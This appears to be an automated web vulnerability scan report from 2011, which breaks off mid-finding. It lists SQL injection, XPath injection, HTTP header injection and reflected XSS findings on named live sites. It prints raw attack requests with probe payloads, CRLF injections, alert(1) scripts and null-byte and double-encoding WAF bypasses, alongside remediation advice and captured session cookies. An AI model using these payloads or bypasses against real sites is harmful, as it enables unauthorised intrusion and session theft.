SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Issue remediation
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The PluID parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the PluID parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
The idd parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the idd parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
The num_ads parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the num_ads parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/javascript; charset=UTF-8 X-Content-Type-Options: nosniff Date: Tue, 03 May 2011 00:09:18 GMT Server: cafe Cache-Control: private X-XSS-Protection: 1; mode=block Content-Length: 20506
{
var google_ads = new Array(); var google_ad; var google_radlinks = new Array(); var google_radlink; var google_info = new Object(); google_ad = new Object(); google_ad.n = 1; google_ad.type = "te ...[SNIP]... &adurl=http://www.grammarly.com/%3Fq%3Dgrammar"; google_ad.visible_url = "www.Grammarly.com/Grammar_Checker"; google_ad.line1 = "Instant Grammar Checker"; google_ad.line2 = "Correct All Grammar Errors And"; google_ad.line3 = "Enhance Your Writing. Try Now!"; google_ad.regionname = ""; google_ads[18] = google_ad; google_info.feedback_url = "http://www.google.com/url?ct\x3dabg\x26q\x3dhttps://ww ...[SNIP]...
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/javascript; charset=UTF-8 X-Content-Type-Options: nosniff Date: Tue, 03 May 2011 00:09:19 GMT Server: cafe Cache-Control: private X-XSS-Protection: 1; mode=block Content-Length: 754
{
var google_ads = new Array(); var google_ad; var google_radlinks = new Array(); var google_radlink; var google_info = new Object(); google_info.feedback_url = "http://www.google.com/url?ct\x3dabg\x ...[SNIP]...
The clicktag parameter appears to be vulnerable to SQL injection attacks. The payloads 13256991'%20or%201%3d1--%20 and 13256991'%20or%201%3d2--%20 were each submitted in the clicktag parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /fcgi-bin/adserv.fcgi?tag=496052&f=2149&ef=1&clicktag=[URLTRACKING]13256991'%20or%201%3d1--%20&rnd=[RANDOM] HTTP/1.1 Host: ieo.solution.weborama.fr Proxy-Connection: keep-alive Referer: http://www.ilsole24ore.com/?refresh_ce User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1 (redirected)
HTTP/1.1 200 OK Date: Mon, 02 May 2011 23:05:30 GMT Server: Apache P3P: CP="NOI DSP COR CURa DEVa PSAa OUR STP UNI DEM" Pragma: no-cache Cache-Control: no-cache Connection: close Content-Type: application/x-javascript Content-Length: 3388
The product_id parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the product_id parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the product_id request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 500 The request has exceeded the allowable time limit Tag: cfoutput Content-Type: text/html;charset=utf-8 Server: Microsoft-IIS/7.0 server-error: true Date: Mon, 02 May 2011 22:58:38 GMT Content-Length: 10083
<!doctype html public "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head> <title>Unexpected Error</title> <style type="tex ...[SNIP]... <pre>coldfusion.runtime.RequestTimedOutException: The request has exceeded the allowable time limit Tag: cfoutput at coldfusion.tagext.io.OutputTag.doStartTag(OutputTag.java:149) at cfonError2ecfm215532197$funcONERROR.runFunction(D:\wwwroot\elsevi ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Oracle.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Oracle.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.
Issue remediation
User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alhanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.
The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload %00' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request
GET /web%00'/notizie/photogallery/hp_photo_index.xml?d=1304392412995 HTTP/1.1 Host: www.ansa.it Proxy-Connection: keep-alive Referer: http://www.ansa.it/web/video/visual.swf Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response (redirected)
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Date: Mon, 02 May 2011 22:15:00 GMT Content-type: text/html Content-Length: 128891
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang ...[SNIP]... <ul xmlns:fn="http://www.w3.org/2005/02/xpath-functions"> ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload %00' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request
GET /web/notizie%00'/photogallery/hp_photo_index.xml?d=1304392412995 HTTP/1.1 Host: www.ansa.it Proxy-Connection: keep-alive Referer: http://www.ansa.it/web/video/visual.swf Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response (redirected)
HTTP/1.1 404 Not found Server: Sun-Java-System-Web-Server/7.0 Date: Mon, 02 May 2011 22:15:06 GMT Content-Length: 43626
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it"> <head> <meta http-equiv="Content ...[SNIP]... <ul xmlns:fn="http://www.w3.org/2005/02/xpath-functions"> ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload %00' was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request
GET /web/notizie/photogallery%00'/hp_photo_index.xml?d=1304392412995 HTTP/1.1 Host: www.ansa.it Proxy-Connection: keep-alive Referer: http://www.ansa.it/web/video/visual.swf Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response (redirected)
HTTP/1.1 404 Not found Server: Sun-Java-System-Web-Server/7.0 Date: Mon, 02 May 2011 22:15:11 GMT Content-Length: 43626
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it"> <head> <meta http-equiv="Content ...[SNIP]... <ul xmlns:fn="http://www.w3.org/2005/02/xpath-functions"> ...[SNIP]...
3. HTTP header injectionpreviousnext There are 5 instances of this issue:
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
3.1. http://a.tribalfusion.com/h.click/aomOnIT6rp3GUVXUFITPip26BbRmjE4WYr1HrLpdZau5mvS3sM6UsvbWGrePPUmTHMQUrMX5resVqMvVEFdPTvIRcFZdQbuxSt79UVnT4r6nodan0EPp3HjESGjG56JZbpdEoTdZbhXbrjYb7f1TAtPbBDTrM4VHU4nF7vRUrFfZcnUYu/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload eb2c3%0d%0ac4e6f30a34e was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /h.click/aomOnIT6rp3GUVXUFITPip26BbRmjE4WYr1HrLpdZau5mvS3sM6UsvbWGrePPUmTHMQUrMX5resVqMvVEFdPTvIRcFZdQbuxSt79UVnT4r6nodan0EPp3HjESGjG56JZbpdEoTdZbhXbrjYb7f1TAtPbBDTrM4VHU4nF7vRUrFfZcnUYu/?eb2c3%0d%0ac4e6f30a34e=1 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=apnlbZaRkP6dPeCnw7cTj0ZaA4FZb2mq3iZc5QWFcgQ1qoaFjZb7yhwYou30slVghs777kSRP6F4n7i4tbkDBKA3flNWD7G4PrKidUMm4uHEhIZbgu7f5RJ6Sa852UJS62FpwTKLUBnfZakQh4lKZc5cvGAin5YrlLuZcrSoenpptWZd5Ws2WcQxH9qhdyub6dneP6MHPteqOCDDfTudRLe8sGVellGGcqPPgCmJZbdQ3cogm2Exrfum7vCU9QcUoVg0iUQ4mSg3bdbyrPVL9SSnqFyl9B85wGr1mSGE8vsQwu873SoOIxNk8Xj16bmj7cg4EZcjdFawnctijtTLoj9brK6A5SyywLwtng11wTxlj8VNZd4a1xCdgFoipLtKE5IjIGrbSBM5hOZdk3hP6nbX2cmrPx259CZcVUrQllJZc1S5MADWQhSgjmADaf4ERECORSWYoZbQZdOekqyZavT6lEatuVUZbxVoGHofFfhvYmYFthR6EEMHBdR57R6xADTxm9SHUXHNetUo5Xs035eWtbPu;
The value of REST URL parameter 2 is copied into the Location response header. The payload c8672%0d%0a22b17c10325 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /c/c8672%0d%0a22b17c10325/U6PZANHGRBHQFBIDRUUZ3E/33IKJE45JFAHDG4ETT36VB HTTP/1.1 Host: d.adroll.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __adroll=9de52dcbec4c3cf1dab71495bd2ad935;
Response
HTTP/1.1 302 Moved Temporarily Server: nginx/0.7.67 Date: Mon, 02 May 2011 22:24:02 GMT Connection: close Set-Cookie: __adroll=9de52dcbec4c3cf1dab71495bd2ad935; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/ Pragma: no-cache P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV' Location: http://a.adroll.com/r/c8672 22b17c10325/U6PZANHGRBHQFBIDRUUZ3E/0d742ed1925a733b1b33d771e0b2e1a8.js: Content-Length: 0 Cache-Control: no-store, no-cache, must-revalidate
The value of REST URL parameter 2 is copied into the Location response header. The payload 76bc1%0d%0ad390fd98756 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /activity/76bc1%0d%0ad390fd98756 HTTP/1.1 Host: go.techtarget.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; ugcCltHeight=; tt_prereg=t1@2240031635%24_2011-05-02%2021%3A29%3A36%26g%3D212087; bk=440e4ed4-5c74-423d-ae57-3ca0a3d609c7; bn_u=UNASSIGNED; __utmz=1.1304389783.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tt_ui=%7B%22fontSize%22%3A0%2C%22lastSite%22%3A%22searchcio-midmarket.techtarget.com%22%7D; __utma=1.51700285.1304389783.1304389783.1304389783.1; __utmc=1; __utmb=1.2.10.1304389783;
Response
HTTP/1.1 302 Found Server: Resin/3.1.8 Location: http://go.techtarget.com//clicktrack-r/activity/76bc1 d390fd98756 Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: close Date: Mon, 02 May 2011 22:26:01 GMT
The URL has moved <a href="http://go.techtarget.com//clicktrack-r/activity/76bc1 d390fd98756">here</a>
The value of the c request parameter is copied into the Set-Cookie response header. The payload a286d%0d%0a1880160ebae was submitted in the c parameter. This caused a response containing an injected HTTP header.
The value of the dv request parameter is copied into the OAS_DE_ERROR response header. The payload cc980%0d%0a52522401ba6 was submitted in the dv parameter. This caused a response containing an injected HTTP header.
HTTP/1.1 500 Internal Server Error Date: Mon, 02 May 2011 22:16:56 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" OAS_DE_ERROR: error converting 'cc980 52522401ba6' value to numeric value [i]. request to 'mfr.247realmedia.com' for '/RealMedia/ads/adstream.cap/123', referer 'http://www.telecomitalia.it/', handler 'cap-add' Cteonnt-Length: 620 Connection: close Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_n1efm_qppm_iuuq=ffffffff09097b8345525d5f4f58455e445a4a423660;path=/;httponly Cache-Control: private Content-Length: 620
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>500 Internal Server Error</title> </head><body> <h1>Internal Server Error</h1> <p>The server encountered an internal error or mis ...[SNIP]...
4. Cross-site scripting (reflected)previousnext There are 56 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f0413<script>alert(1)</script>b1e8f5dc312 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /json/2011-03-01/applications/mediaslot/624BF84E5DF10228E1C8?callback=zanox.cb.ZX624BF84E5DF10228E1C80f0413<script>alert(1)</script>b1e8f5dc312 HTTP/1.1 Host: api.zanox.com Proxy-Connection: keep-alive Referer: http://www.telecomitalia.it/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:14:05 GMT Server: Apache-Coyote/1.1 Content-Type: application/javascript;charset=UTF-8 Connection: close Content-Length: 18973
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %007a6a5"><script>alert(1)</script>3089dd44574 was submitted in the REST URL parameter 1. This input was echoed as 7a6a5"><script>alert(1)</script>3089dd44574 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /submit%007a6a5"><script>alert(1)</script>3089dd44574 HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the cd550 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97a45"><script>alert(1)</script>4f4293691b6 was submitted in the cd550 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
4.4. http://expertsystem.net/clienti_dettaglio.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://expertsystem.net
Path:
/clienti_dettaglio.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd550"><script>alert(1)</script>50bcce83c95 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /clienti_dettaglio.asp?cd550"><script>alert(1)</script>50bcce83c95=1 HTTP/1.1 Host: expertsystem.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=151171949.1304389760.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=151171949.2104177006.1304389760.1304389760.1304392426.2; ASPSESSIONIDCACDTTDR=IFEIGGPCDGDEKIALMBLFBGCI; __utmc=151171949; __utmb=151171949.1.10.1304392426;
Response
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 02 May 2011 22:20:01 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 9055 Content-Type: text/html Cache-control: private
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
4.5. http://expertsystem.net/clienti_home.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://expertsystem.net
Path:
/clienti_home.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53cc3"><script>alert(1)</script>261686493f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /clienti_home.asp?53cc3"><script>alert(1)</script>261686493f3=1 HTTP/1.1 Host: expertsystem.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=151171949.1304389760.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=151171949.2104177006.1304389760.1304389760.1304392426.2; ASPSESSIONIDCACDTTDR=IFEIGGPCDGDEKIALMBLFBGCI; __utmc=151171949; __utmb=151171949.1.10.1304392426;
Response
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 02 May 2011 22:20:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 9045 Content-Type: text/html Cache-control: private
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
4.6. http://expertsystem.net/demo_prodotti.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://expertsystem.net
Path:
/demo_prodotti.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b26cf"><script>alert(1)</script>2636baa7cd0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /demo_prodotti.asp?b26cf"><script>alert(1)</script>2636baa7cd0=1 HTTP/1.1 Host: expertsystem.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=151171949.1304389760.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=151171949.2104177006.1304389760.1304389760.1304392426.2; ASPSESSIONIDCACDTTDR=IFEIGGPCDGDEKIALMBLFBGCI; __utmc=151171949; __utmb=151171949.1.10.1304392426;
Response
HTTP/1.1 200 OK Connection: close Date: Mon, 02 May 2011 22:20:22 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 23399 Content-Type: text/html Cache-control: private
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
4.7. http://expertsystem.net/page.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://expertsystem.net
Path:
/page.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 655a1"><script>alert(1)</script>a91230d7791 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
